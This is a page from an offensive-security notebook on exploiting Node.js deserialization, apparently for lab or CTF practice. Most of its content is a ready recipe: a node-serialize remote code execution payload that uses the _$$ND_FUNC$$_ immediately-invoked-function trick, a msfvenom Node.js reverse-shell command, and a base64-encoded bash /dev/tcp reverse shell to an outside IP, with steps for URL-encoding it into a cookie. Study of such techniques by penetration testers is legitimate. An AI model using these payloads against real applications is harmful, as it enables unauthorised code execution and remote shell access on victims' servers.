🔮
P4n1cBook
  • 🏴‍☠️Welcome!
    • 🔮P4n1cBook
    • 🚨Licence and Disclaimer
    • ⚡About Author
    • 📚Bookmarks
  • Fundamentals
    • Basic Commands
      • Linux
      • Git
    • 🌐Network Protocols
      • ICMP
      • SSH
      • Telnet
      • DNS
      • FTP
      • HTTP/HTTPS
      • SMB
      • SNMP
      • SMTP
      • NFS
      • IPP
      • WinRM
      • LLMNR
    • Databases
      • MySQL
      • NoSQL
    • Web APIs
      • GraphQL
    • Shells/TTYs
    • 💾Regex
    • Dorks
    • Python Essentials
    • Cryptography
    • Reverse Engineering
    • Tools
      • curl
      • Netcat
      • tcpdump
      • Nmap
      • ffuf
      • Gobuster
      • feroxbuster
      • SQLmap
      • 🦈Wireshark
      • Metasploit
      • GoWitness
      • Crunch
      • NetExec
  • Web Exploitation
    • Recon
    • Main Techniques
      • Session Hijacking
      • SSRF
      • Eval Injection
      • Template Manipulation
      • Path Traversal
      • Prototype Pollution
      • XXE
      • Deserialization
      • Log Poisoning
      • Command Injection
      • SQLi
      • Arbitrary File Upload
      • SSTI
      • LFI
      • XSS
    • Web Servers
      • Apache
      • Nginx
    • Web Services
      • HashiCorp Vault
      • Laravel
      • Express
      • Magento
      • Tiny File Manager
      • Joomla
      • CMS Made Simple
      • Werkzeug
      • 🌵Cacti
      • Tomcat
      • Zabbix
      • OpenNetAdmin
      • Wordpress
      • Java-based web application
        • Struts
        • .WAR
        • JDWP
      • ImageMagick
  • Cloud Exploitation
    • Kubernetes
  • Post Exploitation
    • File Transfer
    • Credential Dumping
      • Thunderbird
    • Pivoting/Lateral Movement
    • Persistence
    • Linux Privilege Escalation
      • Hijacks
      • Jailbreaks
      • Binary Exploitation - Linux
      • Kernel Exploits
      • Buffer Overflow - Linux
      • Escaping Docker
  • Wireless Exploitation
    • NFC
Powered by GitBook
On this page
Edit on GitHub
  1. Web Exploitation
  2. Main Techniques

Deserialization

nodejs

  • Install node-serialize:

npm install node-serialize

nodejsshell.py Method:

  1. Create the node reverse shell:

python3 nodejsshell.py 10.10.16.8 4444

  1. Once you have a serialized reverse shell, add it to this function:

var y = {
  rce: function(){ADD/THE/PAYLOAD/HERE}
}
var serialize = require('node-serialize');
var s = serialize.serialize(y)
console.log("Serialized: \n" + s.slice(0,-2) + "()" + s.slice(-2,));

  1. Now serialize convert to base64 the exploit using:

node exploit.js | tail -n +2 | base64 -w0

  • msfvenom also has a module to generate payloads:

msfvenom -p nodejs/shell_reverse_tcp LHOST=10.10.14.10 LPORT=1337 -o shell.js

  • Another great tool is ysoserial

  • Another way is to get command execution is by using this function:

{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('ls /',
function(error, stdout, stderr) { console.log(stdout) });}()"}

  • We can generate a reverse shell out of this by encoding the command first to base64: 

echo 'bash -i >& /dev/tcp/10.10.16.8/4444 0>&1' | base64

  • Now add that string to the function like this:

{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi44LzQ0NDQgMD4mMQo=|base64 -d|bash',
function(error, stdout, stderr) { console.log(stdout) });}()"}

  • Now URL encode the payload and add it to the cookie.

PreviousXXENextLog Poisoning

Last updated 2 months ago